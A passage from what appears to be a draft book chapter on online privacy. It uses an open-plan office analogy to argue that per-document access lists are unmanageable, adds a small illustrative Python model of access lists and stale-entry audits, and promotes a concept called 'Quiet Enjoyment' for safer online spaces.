10. What is a tunnel? It’s of course a tube, quite secure through its length but open at the ends.
11. How do they secure what goes on at the ends? They secure that space as one secures an outdoor space: with barbed wire and guards and sentry gates called “firewalls” and “intrusion detection/prevention systems” and “unified threat management appliances.” (Imagine if your office building were one big open space, with all file cabinets and meeting tables and whiteboards in one huge room. Sentries in the parking lot and at the door would try to tell “bad” cars and people from “good” cars and people, and let only the good ones in.)
12. Even though all files are kept in one big open area, they are not without protection. Each piece of paper in each file folder in each file cabinet has at least four lists attached to it:
a. A list of people who may read it
b. A list of people who may add to it
c. A list of people who may edit it
d. A list of people who may delete it
13. There are literally millions of pieces of paper in hundreds of thousands of folders in thousands of file drawers in this office building without interior walls. To ensure security, it is the responsibility of the person who originally wrote each piece of paper to keep up to date the lists of those who may read, add to, edit, and delete that piece of paper.
14. As you may imagine, even the most diligent employees, who spend half their time managing their pieces of paper, can only do a mediocre job of managing those information resources.
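The four-lists-per-paper arrangement of points 12 through 14 is easy to model, and modeling it shows where it breaks. The following is an added example, not from the book: each document carries its own read, add, edit and delete lists, and only the document’s author updates them. When one employee leaves, the author who remembers to clean up produces a correct list; the author who does not leaves the departed employee with working access, and nothing in the model notices until someone audits every list against the current staff roster. The document titles, names and staffing are invented for the illustration.

```python
from dataclasses import dataclass, field

# The four lists attached to every piece of paper (point 12 above).
ACTIONS = ("read", "add", "edit", "delete")


@dataclass
class Document:
    title: str
    owner: str  # the author, who alone is responsible for the lists (point 13)
    acl: dict = field(default_factory=lambda: {a: set() for a in ACTIONS})


def grant(doc, who, action):
    if action not in ACTIONS:
        raise ValueError(f"unknown action {action!r}")
    doc.acl[action].add(who)


def check(doc, who, action):
    """Sentry at the file drawer: is this person on this paper's list for this action?"""
    if action not in ACTIONS:
        raise ValueError(f"unknown action {action!r}")
    return who in doc.acl[action]


def build_office():
    """Constructed sample office: two papers, three employees."""
    budget = Document("Q3 budget", owner="alice")
    memo = Document("Staff memo", owner="bob")
    for who in ("alice", "bob", "carol"):
        grant(budget, who, "read")
        grant(memo, who, "read")
    grant(budget, "carol", "add")
    grant(budget, "alice", "edit")
    grant(budget, "alice", "delete")
    grant(memo, "bob", "edit")
    grant(memo, "bob", "delete")
    return [budget, memo]


def offboard(docs, who, diligent_owners):
    """An employee leaves. Only the owners who remember to do so strike the name
    from their own papers; no central authority does it for them."""
    for doc in docs:
        if doc.owner in diligent_owners:
            for people in doc.acl.values():
                people.discard(who)


def maintenance_burden(docs):
    """Number of list entries each author is personally responsible for keeping current."""
    burden = {}
    for doc in docs:
        burden[doc.owner] = burden.get(doc.owner, 0) + sum(len(p) for p in doc.acl.values())
    return burden


def stale_entries(docs, current_staff):
    """Audit: every list entry naming someone no longer on staff. In the model
    described above, this is the only way such entries are ever found."""
    stale = []
    for doc in docs:
        for action, people in doc.acl.items():
            for who in sorted(people - current_staff):
                stale.append((doc.title, action, who))
    return stale


if __name__ == "__main__":
    office = build_office()
    offboard(office, "carol", diligent_owners={"bob"})
    print("carol can still read the budget:", check(office[0], "carol", "read"))
    print("entries per author:", maintenance_burden(office))
    print("stale entries:", stale_entries(office, current_staff={"alice", "bob"}))
```

With two papers the audit is trivial; with the millions of papers the text describes, the burden in `maintenance_burden` is spread over every author, and the `stale_entries` audit is the job nobody owns.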
NEED A SHORT TERM FOR THE SOLUTION FOR FIXING THE INTERNET (e.g., providing secure Internet real estate in which to have Quiet Enjoyment). The more we look at the way in which we come to have confidence in our physical buildings, the more we realize that the process of developing reliable online spaces is so similar as to be in many respects identical.
BRIEF SUMMARY PARAGRAPH OF HIGHWAY/INDOORS/BUNKER/QEI.
The open Information Highway exposes two fundamental privacy issues: (1) the loss of personal privacy to the roving gangs of privacy thieves described in this chapter; and (2) the problems we would face if everyone were granted complete inviolable privacy. It would be the rare privacy activist who, given evidence that a team of terrorists was planning a nuclear attack on a large city, would advocate protection of the team’s communication from law enforcement officials.
Later, in a discussion of various technologies related to authentication, privacy, and security, we will introduce anonymizers, which can thoroughly obscure identities of users. We will also suggest ways in which anonymizers and identity credentials can reinforce each other and ways in which anonymizers can effect solutions to public safety problems.
When QEI becomes reality, you will be able to take the steps that will put an end to concerns about privacy, and make your life much more manageable as well. You will be able to have your privacy—and have the Internet too. Identity theft can be a thing of the past. So too can the nagging feeling that uninvited, intrusive marketers are collecting information about you behind your back. In the process, you’ll dramatically reduce the amount of “administrivia” in your life, allowing you to focus on the things that you find meaningful rather than the things that your insurer, health care provider, bank, school, and government agencies find meaningful. QEI will replace those privacy-stealing robots with your own private personal-assistant robots: your own completely diligent personal secretary, filling in all repetitive information in forms, disclosing your personal information only to parties strictly authorized by you, and interrupting you only when your judgment is called for.
How do you do all this?
The answer is as near as your desk in your den.
Would you permit a group of strangers to enter your home unannounced and make copies of everything they found on your desk and in your filing cabinets? Would you allow them to rearrange your files so that they present a view of things that’s more to their liking and more likely to make you do what they would like you to do?
No? Then why let strangers do to your online desk and files what you would never let them do with your physical information facilities?
Let’s move your online desk and your online den out of their current location on the side of a busy highway. It’s time to move them indoors, where Quiet Enjoyment reigns.